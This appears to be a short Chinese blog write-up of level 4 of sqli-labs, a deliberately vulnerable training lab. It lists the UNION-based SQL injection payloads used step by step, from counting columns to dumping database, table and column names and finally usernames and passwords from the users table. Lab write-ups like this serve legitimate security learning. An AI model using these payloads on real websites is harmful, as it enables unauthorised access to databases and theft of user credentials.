zoukankan      html  css  js  c++  java
  • sqli-labs 第四关

    一开始随便注了一下,发现和第三关类似,只是从单引号变成了双引号。

    继续注入,与第三关类似。

     

    然后判断列数,直接 ?id=3") order by 4--+

     发现它还是三列,然后就继续爆库名

    ?id=-3") union select 1,2,database()--+

    爆表名

    ?id=-3") union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--+

    爆字段名

    ?id=-3") union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'--+

     爆数据

    ?id=-3") union select 1,2,group_concat(0x5c,username,0x5c,password)from users--+

    sqlmap 不做解释

  • 相关阅读:
    HDU 5671 矩阵
    HDU 5670
    UVA 11995 STL 使用
    VK Cup 2016
    字段定义
    apache用户
    apache
    使用第三方登录
    setex()
    如果客户端禁用了cookie,如何实现session
  • 原文地址:https://www.cnblogs.com/tac2664/p/13789641.html
Copyright © 2011-2022 走看看